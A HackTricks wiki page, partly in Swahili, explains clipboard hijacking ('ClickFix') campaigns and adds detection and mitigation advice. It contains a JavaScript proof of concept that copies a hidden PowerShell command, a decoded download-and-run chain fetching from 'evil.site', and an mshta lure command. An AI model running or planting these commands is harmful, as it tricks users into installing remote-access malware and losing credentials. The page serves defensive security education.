HackTricksClipboard Hijacking (Pastejacking) Attacks
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
"Usiweke chochote ulichokosa mwenyewe." β ushauri wa zamani lakini bado ni wa maana
Overview
Clipboard hijacking β pia inajulikana kama pastejacking β inatumia ukweli kwamba watumiaji mara kwa mara huiga na kuweka amri bila kuzichunguza. Tovuti mbaya (au muktadha wowote unaoweza kutumia JavaScript kama programu ya Electron au Desktop) inachanganya maandiko yanayodhibitiwa na mshambuliaji kwenye clipboard ya mfumo. Waathirika wanahimizwa, kawaida kwa maagizo ya uhandisi wa kijamii yaliyoundwa kwa uangalifu, kubonyeza Win + R (Run dialog), Win + X (Quick Access / PowerShell), au kufungua terminal na kweka yaliyomo kwenye clipboard, mara moja wakitekeleza amri zisizo na mpangilio.
Kwa sababu hakuna faili inayopakuliwa na hakuna kiambatisho kinachofunguliwa, mbinu hii inapita karibu na udhibiti wote wa usalama wa barua pepe na maudhui ya wavuti yanayofuatilia viambatisho, macros au utekelezaji wa amri moja kwa moja. Shambulio hili kwa hivyo ni maarufu katika kampeni za phishing zinazotoa familia za malware za kawaida kama NetSupport RAT, Latrodectus loader au Lumma Stealer.
JavaScript Proof-of-Concept
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
Older campaigns used document.execCommand('copy'), newer ones rely on the asynchronous Clipboard API (navigator.clipboard.writeText).
The ClickFix / ClearFake Flow
- Mtumiaji anatembelea tovuti iliyo na makosa ya tahajia au iliyovunjwa (e.g.
docusign.sa[.]com) - JavaScript ya ClearFake iliyowekwa inaita
unsecuredCopyToClipboard()ambayo kimya kimya inahifadhi PowerShell one-liner iliyokuwa na Base64 katika clipboard. - Maelekezo ya HTML yanamwambia mwathirika: βBonyeza Win + R, bandika amri na bonyeza Enter kutatua tatizo.β
powershell.exeinatekelezwa, ikipakua archive ambayo ina executable halali pamoja na DLL mbaya (classic DLL sideloading).- Loader inachambua hatua za ziada, inaingiza shellcode na kuanzisha kudumu (e.g. kazi iliyopangwa) β hatimaye inatekeleza NetSupport RAT / Latrodectus / Lumma Stealer.
Example NetSupport RAT Chain
powershell -nop -w hidden -enc <Base64>
# β Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
jp2launcher.exe(halali Java WebStart) inatafuta saraka yake kwamsvcp140.dll.- DLL mbaya inatatua kwa dinamik API na GetProcAddress, inapakua binaries mbili (
data_3.bin,data_4.bin) kupitia curl.exe, inazificha kwa kutumia ufunguo wa rolling XOR"https://google.com/", inaingiza shellcode ya mwisho na inafungua client32.exe (NetSupport RAT) hadiC:\ProgramData\SecurityCheck_v1\.
Latrodectus Loader
powershell -nop -enc <Base64> # Cloud Identificator: 2031
- Inapakua
la.txtkwa kutumia curl.exe - Inatekeleza downloader ya JScript ndani ya cscript.exe
- Inapata payload ya MSI β inatua
libcef.dllpamoja na programu iliyosainiwa β DLL sideloading β shellcode β Latrodectus.
Lumma Stealer kupitia MSHTA
mshta https://iplogger.co/xxxx =+\\xxx
The mshta call launches a hidden PowerShell script that retrieves PartyContinued.exe, extracts Boat.pst (CAB), reconstructs AutoIt3.exe through extrac32 & file concatenation and finally runs an .a3x script which exfiltrates browser credentials to sumeriavgv.digital.
Detection & Hunting
Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
- Windows Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUkeeps a history of Win + R commands β look for unusual Base64 / obfuscated entries. - Security Event ID 4688 (Process Creation) where
ParentImage==explorer.exeandNewProcessNamein {powershell.exe,wscript.exe,mshta.exe,curl.exe,cmd.exe}. - Event ID 4663 for file creations under
%LocalAppData%\Microsoft\Windows\WinX\or temporary folders right before the suspicious 4688 event. - EDR clipboard sensors (if present) β correlate
Clipboard Writefollowed immediately by a new PowerShell process.
Mitigations
- Browser hardening β disable clipboard write-access (
dom.events.asyncClipboard.clipboardItemetc.) or require user gesture. - Security awareness β teach users to type sensitive commands or paste them into a text editor first.
- PowerShell Constrained Language Mode / Execution Policy + Application Control to block arbitrary one-liners.
- Network controls β block outbound requests to known pastejacking and malware C2 domains.
Related Tricks
- Discord Invite Hijacking often abuses the same ClickFix approach after luring users into a malicious server:
References
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.